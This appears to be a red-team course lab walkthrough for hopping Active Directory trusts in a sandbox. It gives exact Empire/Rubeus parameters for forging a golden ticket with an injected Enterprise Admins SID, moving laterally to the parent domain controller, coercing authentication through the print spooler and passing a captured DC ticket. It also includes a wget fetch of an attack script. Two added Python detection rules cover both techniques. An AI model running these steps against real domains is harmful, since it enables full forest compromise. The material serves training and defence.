Lab 4: Hopping Trusts - Parent Child and Tree-Root
Last updated
In this lab we will be interacting with the agent we spawned in Lab 3 on the domain controller of sandbox. If you have no agents running, refer to Lab 3 for instructions on how to spawn a new one.
In this lab you will:
Use the krbtgt hash obtained in Lab 3 to create a golden ticket with SID history
Laterally move to the domain controller of pwnzone
Use Rubeus monitor mode to monitor for incoming TGTs
Use coerced authentication through the print spooler service to trigger an authentication from treasureisland to pwnzone
Import the KRBTGT of the DC of treasureisland
Laterally move to the treasureisland DC
Now that we have the KRBTGT hash of sandbox.pwnzone.lab, we will also need the SID of pwnzone.lab. We can get the SID of the domain by enumerating domain trusts, which is a built-in post-exploitation module in Empire. Interact with the agent that you have running as svc_entrypoint and select the following post-exploitation module:
powershell_situational_awareness_network_powerview_get_domain_trust
Set the API parameter to "true".
Take note of the SID of pwnzone.lab; we will need it for the next step.
In the commands below, replace the sections between <> with the relevant values from previous steps.
Time to create a golden ticket with SID history. In your agent we will have to use Rubeus once again:
csharp_assembly_assembly
file: select rubeus from the dropdown list
parameters:
golden /aes256:<replace with krbtgt aes256 hash> /user:administrator /domain:sandbox.pwnzone.lab /ldap /sids:<replace with SID of pwnzone.lab>-519 /newpac /ptt
If everything went smoothly, we should see a successful ticket import in our tasks tab output from our last command.
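From the defender's side, the ticket created above is recognisable by one property: a logon authenticated by the child domain (sandbox.pwnzone.lab) whose token carries a privileged group SID belonging to the forest root (the pwnzone.lab SID with RID 519, Enterprise Admins). Where "Audit Group Membership" is enabled, Windows records the token's group SIDs alongside each 4624 in event 4627, so a SIEM can compare the account's domain SID prefix with the prefix of every privileged group in the token. The following detection logic is an added example and not part of the lab or of Empire/Rubeus; the domain SIDs and the 4627-style records are constructed placeholders, and the field names are a simplified schema rather than the exact Windows event fields.

```python
import re

# Well-known RIDs of privileged groups. Smuggling one of these across a domain
# boundary in SID history is what the /sids:<root SID>-519 golden ticket relies on.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Constructed placeholder domain SIDs; in practice take these from the trust enumeration.
DOMAIN_SIDS = {
    "S-1-5-21-1111111111-2222222222-3333333333": "pwnzone.lab",          # forest root
    "S-1-5-21-4444444444-5555555555-6666666666": "sandbox.pwnzone.lab",  # child domain
}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Split a domain SID into (domain prefix, RID); (None, None) for other SID forms."""
    m = SID_RE.match(sid)
    if not m:
        return None, None
    return m.group(1), int(m.group(2))


def foreign_privileged_groups(record):
    """Return [(group SID, group name, owning domain)] for every privileged group in the
    logon token that belongs to a different domain than the one that authenticated
    the account. Root-domain admins logging on with their own EA SID are not flagged."""
    acct_domain, _ = split_sid(record["account_sid"])
    hits = []
    for sid in record["group_sids"]:
        dom, rid = split_sid(sid)
        if dom is None or dom == acct_domain:
            continue
        if rid in PRIVILEGED_RIDS and dom in DOMAIN_SIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid], DOMAIN_SIDS[dom]))
    return hits


def triage(records):
    """Map account -> suspicious groups for every record carrying a foreign privileged SID."""
    return {r["account"]: hits for r in records if (hits := foreign_privileged_groups(r))}


# Constructed sample records in a simplified 4624/4627 shape (account SID + token group SIDs).
SAMPLE_RECORDS = [
    {   # ordinary child-domain user: only groups from its own domain
        "account": "SANDBOX\\jdoe",
        "account_sid": "S-1-5-21-4444444444-5555555555-6666666666-1105",
        "group_sids": ["S-1-5-21-4444444444-5555555555-6666666666-513"],
    },
    {   # forest-root Enterprise Admin: privileged, but from its own domain
        "account": "PWNZONE\\ea-admin",
        "account_sid": "S-1-5-21-1111111111-2222222222-3333333333-1200",
        "group_sids": [
            "S-1-5-21-1111111111-2222222222-3333333333-513",
            "S-1-5-21-1111111111-2222222222-3333333333-519",
        ],
    },
    {   # child-domain account whose token carries the root domain's Enterprise Admins SID
        "account": "SANDBOX\\administrator",
        "account_sid": "S-1-5-21-4444444444-5555555555-6666666666-500",
        "group_sids": [
            "S-1-5-21-4444444444-5555555555-6666666666-512",
            "S-1-5-21-1111111111-2222222222-3333333333-519",
        ],
    },
]

if __name__ == "__main__":
    for account, hits in triage(SAMPLE_RECORDS).items():
        for sid, name, domain in hits:
            print(f"{account}: token contains {name} of {domain} ({sid})")
```

The check keys on the domain prefix rather than on the literal -519 suffix, so it also catches Domain Admins or Schema Admins SIDs injected from another domain; a forest-root Enterprise Admin logging on with its own EA SID is left alone because the prefixes match.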
With the new ticket imported, we can now laterally move to the domain controller of pwnzone.lab. In our Empire agent's interact tab select
powershell_lateral_movement_invoke_psremoting
listener: <select from dropdown>
computername: pwnzone-dc01.pwnzone.lab
Repeat the lateral movement step above, as we will need two agents on the parent domain controller for later exploitation.
You now have two new agents on the parent domain controller; it's time to hop to our treasureisland domain.
On one of your two agents we will run Rubeus in monitoring mode; on the other one we will need to coerce authentication.
Before we do that, we will need one more tool. Open up a terminal and type the following command:
wget -O Invoke-SpoolSample.ps1 https://raw.githubusercontent.com/jfmaes/SEC565-Tools/refs/heads/main/Invoke-SpoolSample.ps1
Keep note of the file location where you saved Invoke-SpoolSample.ps1, as you will need it in a few moments.
The runfor parameter indicates how much time you have to trigger the coerced authentication. If you need more than 2 minutes (120 seconds) to switch agents and execute the coerce attack, feel free to increase the runfor timer. Do note that you will not be able to open the output until the timer has expired, so don't set it too high either!
In one of your Empire agents (keep note which one), run Rubeus in monitoring mode:
csharp_assembly_assembly
file: select rubeus from the dropdown list
parameters:
monitor /targetuser:treasure-dc01$ /interval:2 /runfor:120 /consoleoutfile:C:\Users\Public\ticket.txt /nowrap
In your other Empire agent on the DC, run the coerced authentication attack:
Check the output tab to see if the coerced authentication was triggered:
Go to the File Browser tab and navigate to C:\Users\Public\ticket.txt - right click and select download.
Check your Empire server terminal window for information on your download. If you see download errors, Rubeus is still in monitor mode and the file is therefore currently locked. You will have to wait a few more seconds (or however long you set your runfor parameter) until Rubeus is done.
Open up a new terminal window and navigate to the location that is displayed in your Empire logs:
cd <your location of ticket.txt>
Cat the output; it will look similar to this:
Copy the base64-encoded ticket (starts with do, ends with ==).
In your agent interact window, once again leverage Rubeus to pass the ticket:
csharp_assembly_assembly
file: select rubeus from the dropdown list
parameters:
ptt /ticket:<your base64 encoded ticket>
Check the output window to see if the ticket got imported successfully
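The coercion step above leaves two footprints a SIEM can tie together: on the coerced DC, a remote client opens the spooler named pipe over IPC$ (event 5145 with RelativeTargetName spoolss, available when "Audit Detailed File Share" is enabled), and seconds later the coerced DC's machine account (treasure-dc01$) performs a network logon (4624, logon type 3) on the host that will cache its TGT. Either event alone is noisy, since DCs authenticate to each other all the time, but a machine-account logon on a different host within a short window of a spoolss access is a tight signal. The correlation below is an added example, not part of the lab or of Empire/Rubeus; the event records, timestamps, addresses and the "pwnzone-dc01"/"treasure-dc01" host names as they appear here are constructed, and the field names are a simplified schema rather than the exact Windows event fields.

```python
from datetime import datetime, timedelta

# Maximum delay between the spoolss access and the resulting machine-account logon.
WINDOW = timedelta(seconds=30)


def parse_ts(s):
    return datetime.fromisoformat(s)


def short_host(name):
    """Normalise 'pwnzone-dc01.pwnzone.lab' and 'PWNZONE-DC01' to the same key."""
    return name.split(".")[0].upper()


def spoolss_accesses(events):
    """Yield 5145 events where a client opened the spooler named pipe over IPC$."""
    for e in events:
        if (e["event_id"] == 5145
                and e["share_name"].upper().endswith("IPC$")
                and e["relative_target_name"].lower() == "spoolss"):
            yield e


def correlate_spooler_coercion(events):
    """Pair each spoolss access on host A with a later network logon of A's machine
    account (A$) on a different host B inside WINDOW. A logon of A$ back on A itself,
    or outside the window, is ignored."""
    logons = [e for e in events if e["event_id"] == 4624 and e["logon_type"] == 3]
    findings = []
    for access in spoolss_accesses(events):
        coerced = short_host(access["computer"])
        t0 = parse_ts(access["timestamp"])
        for logon in logons:
            delay = parse_ts(logon["timestamp"]) - t0
            if (logon["account_name"].upper() == coerced + "$"
                    and short_host(logon["computer"]) != coerced
                    and timedelta(0) <= delay <= WINDOW):
                findings.append({
                    "triggered_by": access["source_address"],
                    "coerced_host": access["computer"],
                    "authenticated_to": logon["computer"],
                    "machine_account": logon["account_name"],
                    "delay_s": delay.total_seconds(),
                })
    return findings


# Constructed sample events (simplified 5145 / 4624 records); addresses are placeholders.
SAMPLE_EVENTS = [
    {   # ordinary file share access: not the spooler pipe
        "event_id": 5145, "timestamp": "2024-05-01T11:59:40", "computer": "fs01.pwnzone.lab",
        "share_name": "\\\\*\\Data", "relative_target_name": "report.docx",
        "source_address": "10.10.20.33",
    },
    {   # remote client opens spoolss on the treasureisland DC
        "event_id": 5145, "timestamp": "2024-05-01T12:00:00", "computer": "treasure-dc01",
        "share_name": "\\\\*\\IPC$", "relative_target_name": "spoolss",
        "source_address": "10.10.20.5",
    },
    {   # the coerced DC's machine account logs on to the parent DC three seconds later
        "event_id": 4624, "timestamp": "2024-05-01T12:00:03", "computer": "pwnzone-dc01.pwnzone.lab",
        "account_name": "TREASURE-DC01$", "logon_type": 3, "source_address": "10.10.30.10",
    },
    {   # a user logon in the same window: wrong account, not paired
        "event_id": 4624, "timestamp": "2024-05-01T12:00:05", "computer": "pwnzone-dc01.pwnzone.lab",
        "account_name": "jdoe", "logon_type": 3, "source_address": "10.10.20.33",
    },
    {   # the same machine account an hour later: outside the window, not paired
        "event_id": 4624, "timestamp": "2024-05-01T13:00:00", "computer": "pwnzone-dc01.pwnzone.lab",
        "account_name": "TREASURE-DC01$", "logon_type": 3, "source_address": "10.10.30.10",
    },
]

if __name__ == "__main__":
    for f in correlate_spooler_coercion(SAMPLE_EVENTS):
        print(f"{f['triggered_by']} coerced {f['coerced_host']} -> {f['machine_account']} "
              f"logged on to {f['authenticated_to']} after {f['delay_s']}s")
```

The pairing needs both DCs' security logs in the same store, so it is a SIEM rule rather than a host-local one; the spoolss event alone is still worth a lower-severity alert on domain controllers, where no client should be talking to the spooler at all.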
This is as far as we can go in the lab, perhaps you can figure out how to get to treasureisland? ;) Hope you had fun, feel free to keep exploring and hope to see you in SEC565 at some point in the future :D